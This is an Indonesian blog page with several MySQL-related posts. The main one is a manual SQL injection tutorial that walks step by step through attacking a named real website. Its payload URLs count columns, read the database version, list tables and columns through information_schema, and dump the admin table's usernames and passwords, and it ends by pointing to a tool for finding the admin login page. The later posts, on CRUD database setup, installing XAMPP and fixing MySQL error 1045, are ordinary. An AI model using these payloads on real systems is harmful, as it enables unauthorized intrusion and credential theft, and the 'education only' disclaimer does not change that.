Tampilkan postingan dengan label Mysql. Tampilkan semua postingan
Tampilkan postingan dengan label Mysql. Tampilkan semua postingan

Senin, 03 Agustus 2015

Hacking Website With SQL Injection (Manual)








Relate Search : Melihat isi database dengan teknik manual Sql Injection, Mencuri isi database, Sql Injection, Sqli, Dork Sqli, Cara hacking website dengan sql injection, google dork, dork terbaru.

Sql Injection adalah salah satu teknik hacking suatu website yang memanfaatkan bug Sql pada link dinamis, pada url tersebut attacker dapat memasukkan perintah Sql ke dalam statement Sql via input website. Banyak cara untuk melakukan Sql Injection seperti dengan tools SqlMap, Havij dll, tetapi pada tutorial kali ini saya akan menjelaskan tentang cara Sql Injection secara manual melalui addressbar.

Berikut Langkah-Langkahnya :

1. Siapkan target terlebih dahulu, ( Website yang vulnerable terhadap Sql injection ). Cara mencari nya kita dapat menggunakan Google Dork, untuk melihat google dork terbaru bisa lihat DISINI.
untuk definisi Google Dork dan list Google dork terbaru bisa lihat DISINI.

2. Setelah kita dapat targetnya , sekarang kita akan mulai periksa, apakah website tersebut vulnerable terhadap Sql injection, pada kali ini saya akan mengambil contoh dari website berikut :

http://www.firstgulf.com/search-details.php?id=59




3. Tambahkan Quote pada akhir URL. Contoh :

http://www.firstgulf.com/search-details.php?id=59'



4. Terlihat di atas bahwa terjadi Error Pada Sintax Sql website, hal tersebut menunjukkan website vulnerable terhadap Sql Injection. Setelah itu ganti Quote dengan order by <angka>-- untuk melihat berapa table yang di miliki oleh website.


contoh :
http://www.firstgulf.com/search-details.php?id=59 order by 20--  , kita akan mengetahui jumlah table website apabila dalam permintaan jumlah table tidak terjadi error.

seperti contoh sebelumnya yaitu
http://www.firstgulf.com/search-details.php?id=59 order by 20-- . dalam website target ternyata error, maka lanjutkan ke angka yang lebih bawah.
order by 15-- ( Terjadi Error )
order by 13-- ( Terjadi Error )
order by 11-- ( Tidak Terjadi Error ) #Karna pada angka 11 tidak terjadi Error maka lanjutkan ke angka yang lebih besar selanjutnya yaitu 12.

order by 12-- ( Terjadi Error ) # ternyata pada angka 12 terjadi error, maka bisa di pastikan bahwa website target memiliki jumlah table sebanyak 11.

Contoh Error Order Table :



Hosting Unlimited Indonesia


Contoh Order Table Tanpa Error :





5. Setelah di ketahui bahwa jumlah table ada 11, selanjutnya kita mencari angka akan menunjukkan isi databasenya nanti.tambahkan tanda"-" di awal angka 59, dan deretan angka 1 sampai 11 di akhirnya.

http://www.firstgulf.com/search-details.php?id=-59 union all select
1,2,3,4,5,6,7,8,9,10,11--

6. Dapat di lihat pada gambar di atas, Ketika semua angka di pilih pada perintah Sql = Union All select. pada halaman website target muncul segelintir angka yang posisinya tidak menentu, pada contoh kali ini terlihat angka 2, 3 dan 5. Karna angka 3 yang paling terlihat jelas, jadi kita akan menggunakan angka 3.

7. selanjutnya kita akan melihat versi dari Database Mysql Website target.
ganti angka tiga pada Url sebelumnya, dengan "version()" tanpa tanda kutip.


contoh : http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,version(),4,5,6,7,8,9,10,11--

ternyata setelah di lakukan perintah di atas, angka tiga berganti dengan versi dari database mysql target. dapat terlihat versi nya adalah 5.5.32 .
sebenernya ada versi 4.x.x , tapi pada versi tersebut cara ini tidaka akan berhasil karna untuk database versi 4.x.x , kita akan di hadapkan pada cara Blind Sql.




8.  Selanjutnya kita akan melihat isi daftar table yang ada pada website target .
tambah kan pada url sebelumya.


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


9. Terlihat sudah daftar nama semua table website target. kita cari nama table yang hampir mirip atau memang tempat penyimpanan user dan password login website. pada contoh di sini, terlihat ada table yang bernama "admin", kita akan pilih itu untuk di lihat kolomnya. sebelum eksekusi ke pembedahan table "admin", kita harus merubah kata "admin" kedalam bentuk hexadesima, untuk melakukannya silahkan kunjungi DISINI.


 Ganti beberapa kata dalam url tadi :

http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e--

NB : kata database() di ganti dengan nama table "admin" yang sudah di jadikan hexadesimal, ditambah 0x di depannya jadi = 0x61646d696e .

10. Setelah langkah di atas selesai dan berhasil, kita akan melihat isi dari table "admin" yaitu beberapa kolom. berikut nama-nama kolom pada table "admin".

# id
# admin_name
# admin_login
# admin_password



11.  Setelah di dapati  semua nama kolom, sekarang waktunya untuk melihat isi dari kolom tersebut.

ketik :


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(id, 0x3a,admin_name,0x3a,admin_login,0x3a,admin_password,0x0d0a),4,5,6,7,8,9,10,11 from admin--

NB : 
0x3a adalah bentuk Hexadesimal dari ":" (colon)
0x0d0a adalah bentuk Hexadesimal dari <enter>


12. akhirnya sudah terlihat isi dari kolom "admin" , di situ sudah terpampang
 id:admin_name:admin_login:admin_password

13. Untuk pengembangan selanjutnya anda bisa melakukan login ke halaman admin atau hanya melakukan pentesting terhadap database.
apabila ingin melanjutkan login, silahkan cari halaman login dengan tools, adminfinder.py download DISINI.

berikut ScreenShot nya :




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Kamis, 08 Januari 2015

Membuat Website CRUD Hari-1


Relate search :  Membuat, Website, CRUD, Create, Update, Delete, Read, PHP, Mysql, Xampp.

CRUD adalah singkatan dari Create, Read, Update, Delete. CRUD harus di pakai apabila ingin membuat website yang dinamis, CRUD di lakukan di dalam database, tetapi pengorperasiannya di lakukan di dalam bahasa pemrograman, dalam tutorial hari pertama saya menggunakan bahasa pemrograman web yang paling banyak di pakai yaitu PHP (Personal Home Page/ Hypertext Preprocessor) , dan database yang saya gunakan adalah DBMS MYSQL, dalam website CRUD kita akan melakukan operasi membuat, membaca, mengupdate, dan menghapus data yang ada di dalam database. kebanyakan website CRUD umum di gunakan untuk website sistem informasi.

hal-hal pertama yang harus di lakukan dalam membuat website crud adalah :

1. Webserver : Apache , Nginx , IIS.
2. Database Management Sistem : Mysql, Postgresql, Oracle.
3. File Transfer Protocol : Filezilla
4. Editor text : Notepad++, Sublime, Dreamweaver, AptanaStudio dll
5. Web Browser  : Chrome, Mozilla Firefox ( dianjurkan ) .

NB :  untuk nomer 1 sampai 3 , kita bisa ganti dengan software penyedia service developing web seperti XAMPP, WAMPP dll. pada software ini sudah di sediakan software yang di gunakan untuk support operate testing web.

pada tutorial ini saya menggunakan XAMPP, browser Chrome, dan editor text AptanaStudio ,di anjurkan pembaca menggunakan software yang sama untuk memudahkan pemahaman dan meminimalisir kesalahan. untuk mengetahui cara install xampp silahkan kunjungi disini . 

langkah pertama untuk membuat website CRUD adalah menentukan idenya , pada tutorial kali ini saya akan mencontohkan website untuk pendataan identitas sekolah.

langkah kedua adalah membuat databasenya. berikut langkah-langkahnya : 

1. jalankan xampp, buka chrome browser : ketikkan http://localhost/phpmyadmin 


2. selanjutnya buatlah databasenya, klik tab database, masukkan nama databasenya, pada contoh saya kasih nama "sekolah". lalu klik create.



3. lalu buat table nya, masukkan nama table dan jumlah table, pada contoh saya kasih nama "data_siswa" dengan jumlah kolom 10. klik GO.


4. masukkan nama kolom dan kriterianya sesuai table berikut..

Nama Kolomtipeket
idintPrimary key , AI
namalengkapvarchar(20)
tanggallahirdate
tempattext
tempattinggalvarchar(20)
namaayahvarchar(20)
namaibuvarchar(20)
namasekolahvarchar(20)
nomerhpbigint
tanggalmasukdatetime



5. setelah melakukan langkah di atas, akhirnya kita telah menyelesaikan tahap pembuatan website CRUD di hari pertama, untuk selanjutnya kita akan masuk ke tahap introducing php di "Membuat Website CRUD Hari-2".

NOTE : 3xpl01t memberikan tawaran bagi pembaca yang ingin order membuat website, bisa order ke kami , untuk tata caranya bisa masuk ke link berikut. 

Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Rabu, 07 Januari 2015

Install XAMPP di Linux ( Ubuntu 14.04 )

Relate search : Install, Xampp, Wampp, Apache, Mysql, PHPMyadmin, Linux, Ubuntu, Gnome, Server, Web, Browser.

Xampp adalah software yang di buat oleh Apache Friends dari Apache Corporation yang di tujukan untuk memudahkan para web developer dalam membuat website, peran xampp dalam developing website adalah menyediakan software-software yang di butuhkan dalam operating website, seperti : Web Server(Apache dan Tomcat) , DBMS(mysql), dan Filezilla (untuk FTP). dengan adanya xampp , web developer tidak perlu repot-repot menginstall satu-satu software di atas, dengan hanya menginstall xampp, semua software tersebut langsung terinstall built in. 

untuk mendapatkan sotware xampp bisa anda download si website resminya di ApacheFrieds, masuk ke menu downloads. xampp memiliki 3 versi untuk 3 platform yang berbeda, yaitu versi Windows, Linux dan OSX. pada tutorial kali ini saya akan memandu anda untuk menginstall Xampp di linux, jadi silahkan downloads yang versi linux.


setelah anda memiliki xampp versi linux, maka kita akan lanjut ke langkah-langkah menginstallnya. beirkut langkah-langkahnya : 

1. buka terminal , tekan alt+ctrl+t atau , masuk ke menu lalu klik terminal. masuk ke level root

lalu masuk ke direktory di mana anda menyimpan file instalasi xampp.
contoh  : 



2. pada gambar di atas terdapat 2 file xampp yaitu xampp-1.7.7 yang bertipe tarball gzip. dan file xampp-1.8.3 yang bertipe *.run, apabila anda download xampp terbaru (sampai artikel ini di post) maka anda akan mendapatkan file xampp yang bertipe *.run . untuk menginstallnya terlebih dahulu ganti permission dari file xampp tadi menjadi execute , untuk dapat di jalankan , untuk menjadikan permissionnya execute, ketik : chmod 777 xampp-linux-1.8.3-1-installer.run ganti text berwarna merah dengan nama file xampp yang anda download.



3. kemudian ketik :  ./xampp-linux-1.8.3-1-installer.run ganti tex warna merah dengan file xampp anda. setalah itu tekan enter.


lanjutkan untuk langkah-langkah installnya sesuai gambar di bawah ini. :









setelah selesai install , lalu jalankan xampp manager untuk menjalankan program-program yang ada di dalamnya.

screenshot program xampp manager. :



NB : ada dua cara untuk menjalankan xampp di linux yaitu : 
1. menggunakan xampp-manager gui seperti gambar di atas.
2. menggunakan terminal yaitu dengan mengetikkan perintah : 
/opt/lampp/lampp start 



NOTE : 3xpl01t memberikan tawaran bagi pembaca yang ingin order membuat website, bisa order ke kami , untuk tata caranya bisa masuk ke link berikut. 
Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Jumat, 28 November 2014

How to Fix ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

This Articels is about Fix Problem connecting Mysql.

Relate search : ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

Pertanyaan :  I've been install mysql in my linux operating system, but when I run, its going error. how can I fix it?

Mysql adalah salah satu DBMS yang paling banyak di gunakan, baik itu untuk lingkungan Desktop , mobile ataupun WEB, di lingkungan web database mysql adalah DBMS yang paling banyak di gunakan, Query-Query yang ada di mysql tidak semuanya berbeda, sebagian besar query yang di gunakan sama seperti DBMS yang lain. PHPmyadmin adalah aplication database yang di gunakan untuk mengatur mysql dengan GUI version.

Mysql bersifat multiplatform, jadi dapat di gunakan untuk banyak operating system dan bahasa pemrograman, pada tips and trick kali ini, saya akan membahas tentang problem yang terjadi saat kita menjalankan mysql via terminal di linux. berikut error yang muncul : 

ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)


sudah beberapa hari saya mendapatkan error ini, tapi saya hiraukan karna masih belom penting, tapi kemaren waktu praktikum database, akhirnya di butuhkan juga. dan saya terpaksa untuk mencoba memperbaikinya, dapet satu jam googling akhirnya dapet juga dari website stackoverflow, ada yang bertanya dan ada yang jawab juga, saya coba satu-satu akhirnya dapet satu yang berhasil :D  berikut saya praktekkan cara memperbaikinya :

1. Masuk ke user root : ketik $ sudo su 
2. setelah masuk user root, sekarang ketik # mysql -u root -p
  • apabila terdapat error > ERROR 2002 (HY000) : Can't connect to local Mysql server bla bla bla : itu berarti mysql anda masih belum berjalan. untuk menjalankan nya ketik : # service mysql start
  • apabila terdapat error > ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO) : itu berarti error karna password atau user yang kita masukkan salah.
3. berikut adalah tampilan jejak beberapa langkah di atas : 

  • setelah itu ketik : # dpkg-reconfigure mysql-server-5.5


4. Setelah perintah di atas di jalankan, maka akan keluar tampilan seperti berikut di terminal anda. terdapat perintah untuk mengisikan password baru untuk user root , isikan password sesuai yang anda inginkan. setelah itu tekan arah bawah di keyboard untuk masuk ke tombol <ok>, lalu [enter].


5. ketikkan password yang sama seperti yang awal tadi, lalu pilih <ok>




6. tunggu proccess pemberhentian mysql service sampai selesai.



 7. jalankan mysql : ketik # service mysql start



8. dan akhirnya kita akan ke tahap untuk masuk mysql : ketik # mysql -u root -p  lalu enter > ketikkan password baru anda, lalu enter lagi. apabila berhasil maka anda akan masuk ke lingkungan mysql DBMS seperti gambar di bawah. Conratulation !!! :)



Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Search